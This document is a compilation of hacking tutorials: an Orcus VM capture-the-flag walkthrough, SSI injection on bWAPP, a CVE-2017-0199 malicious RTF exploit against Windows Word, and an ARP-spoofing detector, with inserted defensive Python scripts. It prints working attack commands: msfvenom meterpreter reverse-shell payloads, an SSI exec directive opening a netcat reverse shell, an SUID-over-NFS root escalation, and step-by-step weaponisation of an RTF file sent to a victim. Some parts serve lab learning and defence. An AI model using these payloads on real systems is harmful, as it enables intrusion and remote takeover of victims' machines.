Hack the Orcus VM CTF Challenge

Hello friends! Today we are back with a new VulnHub challenge, “ORCUS”, designed by Mr. Viper. In this article we share the steps we used to complete the challenge, capture the flags and beat the goal of this VM. The machine contains 4 flags:

1. Get a shell
2. Get root access
3. There is a post-exploitation flag on the box
4. There is something on this box

You can download it from here.

Let’s Breach!! With the target IP in hand, and since enumeration must be the first step in gathering information about any victim, I ran a version scan with nmap.

nmap -p- -sV

From the screenshot you can see that many ports are open, but I will start with port 80.

Since port 80 was open I browsed to the target IP, but nothing remarkable turned up there.

Without wasting time I chose another tool, dirb, to brute-force directories. To start the directory brute-force, open the terminal and type the following:


Awesome! We have stepped in the right direction and dug out many directories. In the screenshot I have highlighted the “backups” directory, so that is where I will go next.

In the browser I explored the backups URL, where I found a tar file, “simple PHP Quiz-backup.tar.gz”. Without wasting time I downloaded it for further enumeration.

After extracting it I found PHP and HTML files inside. Keeping an eye on the PHP files, I chose db-conn.php to look for details, hoping to find something related to the database.

Finally, after some effort, I found the database username and password: dbuser: dbpasswords respectively.

The dirb brute-force found many directories; if you scroll up to the earlier screenshot you will notice a phpmyadmin directory. I went back to the browser and opened that URL. In the screenshot below you can see that I entered the username and password found above.

With correct credentials you are allowed into the phpMyAdmin page. From the screenshot you can see that I logged in successfully with those credentials; here I found a database “zenphoto” and decided to look inside it for further details.

Inside zenphoto I found a setup page which updates the database configuration file on the web server once the information is filled into the given text fields.

Here we only need to provide the database username, i.e. dbuser, and the database password, i.e. dbpassword.

Without disturbing the other fields, click Save, which begins the zenphoto database installation.

The installation starts when you click the Go tab at the end of the page. The zenphoto setup will install the theme and plugins for your database, after which you have to set the admin user and password.

Next, click the “I agree to these terms and conditions” tab.

Now type admin as the name of the new user and password as the password, confirm the password as shown in the image below, then click the Apply tab at the top.

Then log in to zenphoto with the credentials admin: password. Once inside the admin console we decided to upload an image, but here only zip files can be uploaded.

Now use msfvenom to generate a malicious PHP script by typing the following command.

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

From the screenshot you can read the generated PHP script. At this point we need to copy the highlighted text, paste it into a text document and save it as shell.php. After that, create a new folder, copy shell.php into it and compress the folder.

Most importantly, start the multi/handler inside Metasploit.

Then return to the browser to upload your zip file: browse to the file and click Upload. Then open the following URL; from the image you can see that our shell.php has been uploaded successfully. Now click on it.

When you click on shell.php you will get a meterpreter session inside Metasploit. Now type the following commands to catch the flag.

meterpreter > cd /var/www

meterpreter > ls

meterpreter > cat flag.txt

Congrats! We have caught the 1st flag.

After some more digging I found a folder named kippo, so I headed there for more information.

meterpreter > pwd

meterpreter > cd ..

meterpreter > cat etc/kippo/data/userdb.txt

Finally! Caught the 2nd flag as well.

Now, for root privilege escalation, open a text document and add the following (reference):



Then save it as raj.c on the desktop.

Now upload the raj.c file, compile it and gain root access as shown in the following image.

meterpreter > upload /root/Desktop/raj.c

meterpreter > shell

gcc -o raj raj.c

Since we know from the nmap result that the NFS port was open on the target, we will take advantage of it and mount the target’s /tmp on our Kali Linux. Create a folder named mount and mount the data inside it.

mount -t nfs mount

chown root:root raj

chmod u+s raj



cd /root

cat flag.txt

Great!! We have caught the 3rd flag as well.
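As an added defensive check (not from the original post): the chown/chmod trick above only leaves a root-owned SUID binary on the server because the export lets the client's root act as root. This script parses an /etc/exports file (a constructed sample, not the Orcus VM's) and flags exports configured with no_root_squash, rating world-open ones highest.

```python
# Added example, not from the original post. Audits an NFS exports file for
# the setting that makes the SUID trick work: with no_root_squash the client's
# root keeps uid 0 on the server, so files it chowns to root and marks SUID
# stay that way. With the default root_squash they would belong to nobody.
import re

# Constructed sample of an /etc/exports file (not from the Orcus VM).
SAMPLE_EXPORTS = """\
# exports sample
/tmp        *(rw,sync,no_root_squash)
/srv/share  192.168.1.0/24(ro,sync)
/home/data  10.0.0.5(rw,no_subtree_check,no_root_squash)
"""

CLIENT_SPEC = re.compile(r"([^(]*)(?:\((.*)\))?$")

def parse_exports(text):
    """Yield (path, client, [options]) for every client of every export."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        for spec in clients:
            m = CLIENT_SPEC.match(spec)
            host = m.group(1) or "*"              # "(rw)" alone means everyone
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            yield path, host, opts

def audit_exports(text):
    """Return (severity, path, host, reason) tuples; an empty list means clean."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "no_root_squash" in opts:
            # Open to any host is worse than a single pinned client.
            sev = "HIGH" if host in ("*", "0.0.0.0/0") else "MEDIUM"
            findings.append((sev, path, host,
                             "no_root_squash lets a remote root create root-owned SUID files"))
        elif host == "*" and "rw" in opts:
            findings.append(("LOW", path, host, "world-writable export"))
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(*finding)
```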

Now try yourself to find out one more flag.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media and Gadgets Lover.

Server Side Injection Exploitation in bWapp

In this article you will learn how to exploit a server using Server-Side Includes injection, commonly known as SSI injection.

SSIs are directives present in web applications, used to feed an HTML page with dynamic content. The Server-Side Includes attack allows exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected into input fields and sent to the web server.

For more information visit owasp.org

Let’s begin

In your Kali Linux, open the target IP in the browser: enter the username and password as bee and bug respectively.

Set the security level to low, choose your bug from the list box, select Server-Side Includes (SSI) Injection and click Hack.

Now a web page will open with two text fields, for first name and last name respectively.

I entered the random name test: test as the first name and last name respectively, to see exactly what I would get when clicking the Lookup tab. Here the first name text field is vulnerable to SSI injection.

When I clicked Lookup, a new web page popped up showing the IP of my Kali Linux.

Now I will try to exploit this vulnerability by sending different types of malicious code to the web application. If you look carefully at the following screenshot, I sent a script which generates an alert prompt on the screen. To do this, modify the first name text field and type the following code inside it.


When we click Lookup again, an alert prompt “hack” pops up on the screen. This confirms that the first name text field is vulnerable.

If I want to fetch cookies from the web server, that is possible here as well; we only need to type the following script code in the same text field.


Again an alert prompt will pop up, this time with the server’s cookie, which we can use for further exploitation.

Using the exec directive we can execute a server-side command with cmd as the parameter. Here I am retrieving a listing of all files and folders with the following code.

<!--#exec cmd="ls -a" -->

Wonderful!! As you can see, without fully compromising the server we have obtained all the directories present on it.

Finally we will try to get a remote shell using netcat, which establishes a reverse connection with the target system. Open a terminal to start a netcat listener on port 4444 and type the following inside the vulnerable text field as done above.

<!--#exec cmd="nc 4444 -e /bin/bash" -->

When you click the Lookup tab again you will get a reverse connection on the netcat shell, as I received in the following image. This means the web application server is compromised and we can execute further commands to penetrate deeper.
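As an added example for defenders (not from the original post or bWAPP): this script recognises SSI directives such as the `<!--#exec ... -->` payloads above inside submitted parameters (constructed request lines below; /ssi/lookup.php is a hypothetical endpoint) and shows the output escaping that prevents a directive from ever forming.

```python
# Added example, not from the original post or bWAPP. Detects SSI directives
# in submitted form parameters and shows the output encoding that stops them.
import html
import re
from urllib.parse import parse_qs, urlparse

# An SSI directive is an HTML comment shaped like <!--#cmd param="value" -->;
# the pattern tolerates stray whitespace between the pieces.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|include|echo|config|set|printenv|fsize|flastmod)\b", re.I)

# Constructed request lines; /ssi/lookup.php is a hypothetical endpoint.
SAMPLE_REQUESTS = [
    "GET /ssi/lookup.php?firstname=test&lastname=test&form=submit",
    "GET /ssi/lookup.php?firstname=%3C%21--%23exec+cmd%3D%22ls+-a%22+--%3E&lastname=x",
    "GET /ssi/lookup.php?firstname=%3C%21--%23echo+var%3D%22DOCUMENT_NAME%22+--%3E&lastname=x",
    "GET /index.php?q=%3C%21--+just+an+html+comment+--%3E",
]

def find_ssi_injection(request_line):
    """Return [(param, directive)] for every SSI directive in the query string."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    params = parse_qs(urlparse(parts[1]).query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        for value in values:                  # parse_qs already URL-decodes
            m = SSI_DIRECTIVE.search(value)
            if m:
                hits.append((name, m.group(1).lower()))
    return hits

def sanitize_for_html(value):
    """Escape user input before it lands in an SSI-processed page: '<' becomes
    '&lt;', so the '<!--#' opener can never be reassembled by the server."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(find_ssi_injection(line) or "clean", "<-", line)
```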




Exploit Windows 10 PC with Microsoft RTF File (CVE-2017-0199)

Microsoft Word is vulnerable to malicious RTF files. In this article we carried out a zero-day attack on MS Word 2013 using a Python script which generates a malicious .rtf file and gives a meterpreter session on the target system.

Exploit toolkit CVE-2017-0199 – v2.0 is a handy Python script which provides a quick and effective way to exploit the Microsoft RTF RCE. It can generate a malicious RTF file and deliver a Metasploit/meterpreter or any other payload to the victim without any complex configuration.

Let’s start!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007 – 2013)

Open the terminal in your Kali Linux and type the following to download the script.

git clone https://github.com/bhdresh/CVE-2017-0199.git

cd CVE-2017-0199

python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u

This command runs a Python script to generate a rich text format payload, where -M gen selects generation of the RTF file, -w sets the name of the RTF file, i.e. “sales.rtf”, and -u sets the attacker’s IP address or domain name.

As you can see in the screenshot, the above command has generated a malicious sales.rtf file. Before we send this file to the victim we need to connect it to a backdoor file so that we can establish a reverse connection with the victim.

In a new terminal use msfvenom to prepare an exe payload for the attack by typing the following.

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe > /root/Desktop/raj.exe

Now move raj.exe into /var/www/html.

Now type the following command, which merges raj.exe with sales.rtf. Then share the updated RTF file with the victim and start multi/handler at the same time to receive the victim’s reverse connection.

python cve-2017-0199_toolkit.py -M exp -e -l /var/www/html/raj.exe

When the victim opens the sales file, which will be in doc format, the attacker receives a meterpreter session inside the Metasploit framework.

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo


How to Detect Sniffer in Your Network using shARP

This article introduces a newly launched tool, shARP, an anti-ARP-spoofing program that uses an active scanning process to identify any ARP-spoofing event.

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks. Our anti-ARP-spoofing program (shARP) actively detects the presence of a third party in a private network. It has two modes: defensive and offensive.

Defensive mode protects the end user from the spoofer by disconnecting the user’s system from the network and alerting the user with an audio message.

Offensive mode disconnects the user’s system from the network and further kicks out the attacker by sending de-authentication packets to his system, preventing him from reconnecting to the network until the program is manually reset.

The program creates a log file (/usr/shARP/) containing details of the attack such as the attacker’s MAC address, MAC vendor, and the time and date of the attack. We can identify the NIC of the attacker’s system with the help of the obtained MAC address. If required, the attacker can be permanently banned from the network by adding his MAC address to the router’s block list.

Let’s start!

Open the terminal in Kali Linux and type the following command to download it:

git clone https://github.com/europa502/shARP.git

If the user wants to secure his network by scanning for an attacker, he can run the program. It offers a simple command line interface which makes it easy for new users. Now type the following commands to run the program:

chmod 777 shARP.sh

./shARP.sh -h

Then we used zANTI to sniff the network and start a MITM attack on the selected target IP, so that we could view its network traffic.

When the user runs the program in defensive mode, as soon as it detects a spoofer in the network it disconnects the user’s system from the network to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.

./shARP.sh -d eth0

From the screenshot you can see the highlighted text showing the MAC address of the Android phone attempting the spoofing.

When it finds spoofing in the network it disconnects the user from the network; from the screenshot you can see the user is now assigned only its localhost IP.
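As an added example (not part of shARP or the original post): a passive companion to shARP's active scan that reads snapshots of the Linux neighbour table (`ip neigh` output, constructed here with a hypothetical gateway and MAC addresses) and alerts when the gateway's MAC changes or one MAC claims several IPs, the two traces an ARP spoofer leaves in the victim's cache.

```python
# Added example, not part of shARP or the original post. Compares a pinned
# gateway MAC against the current neighbour table and looks for one MAC
# answering for several IPs, which is what a spoofer doing MITM looks like
# from the victim's side.
import re

NEIGH_LINE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-f:]{17}) (?P<state>\S+)$")

# Assumptions for the constructed sample network: the gateway address and
# its MAC as recorded from a known-good baseline.
GATEWAY_IP = "192.168.1.1"
KNOWN_GATEWAY_MAC = "aa:bb:cc:dd:ee:01"

# Constructed `ip neigh` snapshots, before and during a spoofing attempt.
BEFORE = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:20 STALE
"""
AFTER = """\
192.168.1.1 dev eth0 lladdr de:ad:be:ef:00:42 REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:20 STALE
192.168.1.37 dev eth0 lladdr de:ad:be:ef:00:42 REACHABLE
"""

def parse_neigh(text):
    """Map IP -> MAC for every entry that carries a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def detect_spoofing(snapshot_text, gateway_ip=GATEWAY_IP, gateway_mac=KNOWN_GATEWAY_MAC):
    """Return a list of alert strings; empty means the snapshot looks clean."""
    table = parse_neigh(snapshot_text)
    alerts = []
    seen = table.get(gateway_ip)
    if seen and seen != gateway_mac.lower():
        alerts.append(f"gateway {gateway_ip} now answers from {seen}, expected {gateway_mac}")
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    for label, snap in (("before", BEFORE), ("after", AFTER)):
        print(label, detect_spoofing(snap) or "clean")
```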
